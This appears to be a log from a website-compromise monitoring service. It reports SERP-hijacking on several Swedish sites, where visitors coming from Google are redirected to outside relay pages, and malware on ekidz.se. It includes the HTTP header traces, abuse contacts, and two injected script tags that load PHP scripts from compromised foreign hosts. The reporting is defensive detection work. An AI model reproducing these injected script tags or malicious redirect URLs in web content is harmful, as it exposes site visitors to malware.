nginx/1.6.0 <br>Date: Wed, 25 Jun 2014 08:56:17 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://hotelruralrocaabade.com/relay.php<br><br>euro-trade.se is on 192.185.182.14<br>ASN for 192.185.182.14: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.182.14 corresponds with 192-185-182-14.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1403761754http://euro-trade.se/convenience-store.htm (192.185.182.14) - Serp-hijackingAttacked url: http://euro-trade.se/convenience-store.htm<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 24 Jun 2014 20:59:21 +0200<br><br>Visitors with referer are redirected to http://hotelruralrocaabade.com/relay.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.6.0 <br>Date: Tue, 24 Jun 2014 18:59:21 GMT <br>Content-Type: text/html <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: PHPSESSID=cd792d2615b878b1524ac4c995326084; path=/ <br>Location: http://euro-trade.se/index.htm <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Referer: http://www.google.com/search?q=euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.6.0 <br>Date: Tue, 24 Jun 2014 18:59:21 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://hotelruralrocaabade.com/relay.php<br><br>euro-trade.se is on 192.185.182.14<br>ASN for 192.185.182.14: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.182.14 corresponds with 192-185-182-14.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1403677335http://euro-trade.se/ (192.185.182.14) - Serp-hijackingAttacked url: http://euro-trade.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 24 Jun 2014 19:42:05 +0200<br><br>Visitors with referer are redirected to http://hotelruralrocaabade.com/relay.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.6.0 <br>Date: Tue, 24 Jun 2014 17:42:05 GMT <br>Content-Type: text/html <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: PHPSESSID=58655e63f34a7e01e31ee660881ecbdd; path=/ <br>Location: http://euro-trade.se/index.htm <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Referer: http://www.google.com/search?q=euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.6.0 <br>Date: Tue, 24 Jun 2014 17:42:05 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://hotelruralrocaabade.com/relay.php<br><br>euro-trade.se is on 192.185.182.14<br>ASN for 192.185.182.14: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.182.14 corresponds with 192-185-182-14.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1403677316http://ekidz.se/ads/fleeceoverall-unisex/ (192.185.185.249) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://bauservice-pongrac.de/cgi-bin/Ypf7xwNg.php?id=81464882&quot;&gt;<br><br>Offensive url: http://bauservice-pongrac.de/cgi-bin/Ypf7xwNg.php?id=81464882<br>Url is blacklisted in Google Safe Browsing<br><br>ekidz.se is on 192.185.185.249<br>ASN for 192.185.185.249: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.185.249 corresponds with 192-185-185-249.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1397195555http://ekidz.se/ (192.185.185.249) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://www.rain-fox.cz/img/v3WnRLJf.php?id=81464882&quot;&gt;<br><br>Offensive url: http://www.rain-fox.cz/img/v3WnRLJf.php?id=81464882<br>Url is blacklisted in Google Safe Browsing<br><br>ekidz.se is on 192.185.185.249<br>ASN for 192.185.185.249: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.185.249 corresponds with 192-185-185-249.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1396851642http://euro-trade.se/business.htm (192.185.182.14) - Serp-hijackingAttacked url: http://euro-trade.se/business.htm<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 16 Jan 2014 07:33:16 +0100<br><br>Visitors with referer are redirected to http://hotelruralrocaabade.com/relay.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.4.4 <br>Date: Thu, 16 Jan 2014 06:33:16 GMT <br>Content-Type: text/html <br>Connection: close <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: PHPSESSID=49affe809d84d3cb14da2b04988acbb4; path=/ <br>Location: http://euro-trade.se/index.htm <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: euro-trade.se <br>Referer: http://www.google.com/search?q=euro-trade.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Server: nginx/1.4.4 <br>Date: Thu, 16 Jan 2014 06:33:16 GMT <br>Content-Type: text/html; charset=iso-8859-1 <br>Connection: close <br>Location: http://hotelruralrocaabade.com/relay.php<br><br>euro-trade.se is on 192.185.182.14<br>ASN for 192.185.182.14: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.182.14 corresponds with 192-185-182-14.unifiedlayer.com<br>Abuse.net has 1 reliable address(es) for unifiedlayer.com<br>Found address(es): abuse@unifiedlayer.com1389856605http://mx5cup.se/ (192.185.5.202) - Serp-hijackingAttacked url: http://mx5cup.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 19 Nov 2013 16:57:19 +0100<br><br>Visitors with referer are redirected to http://unitedboss.ru/marc/index.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mx5cup.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Tue, 19 Nov 2013 15:57:19 GMT <br>Server: Apache <br>Location: http://www.spvm.se/index.php/mx5-cup <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mx5cup.se <br>Referer: http://www.google.com/search?q=mx5cup.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Tue, 19 Nov 2013 15:57:19 GMT <br>Server: Apache <br>Location: http://unitedboss.ru/marc/index.php <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>mx5cup.se is on 192.185.5.202<br>ASN for 192.185.5.202: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.5.202 corresponds with ns8071.hostgator.com<br>Abuse.net has 1 reliable address(es) for hostgator.com<br>Found address(es): abuse@hostgator.com1384931338http://mx5cup.se/ (192.185.5.202) - Serp-hijackingAttacked url: http://mx5cup.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 22 Oct 2013 22:54:36 +0000<br><br>Visitors with referer are redirected to http://unitedboss.ru/marc/index.php <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mx5cup.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Tue, 22 Oct 2013 22:51:54 GMT <br>Server: Apache <br>Location: http://www.spvm.se/index.php/mx5-cup <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: mx5cup.se <br>Referer: http://www.google.com/search?q=mx5cup.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Tue, 22 Oct 2013 22:51:53 GMT <br>Server: Apache <br>Location: http://unitedboss.ru/marc/index.php <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>mx5cup.se is on 192.185.5.202<br>ASN for 192.185.5.202: 20013<br>Abusix contact information: ipadmin@websitewelcome.com (information only)<br>192.185.5.202 corresponds with ns8071.hostgator.com<br>Abuse.net has 1 reliable address(es) for hostgator.com<br>Found address(es): abuse@hostgator.com1382514293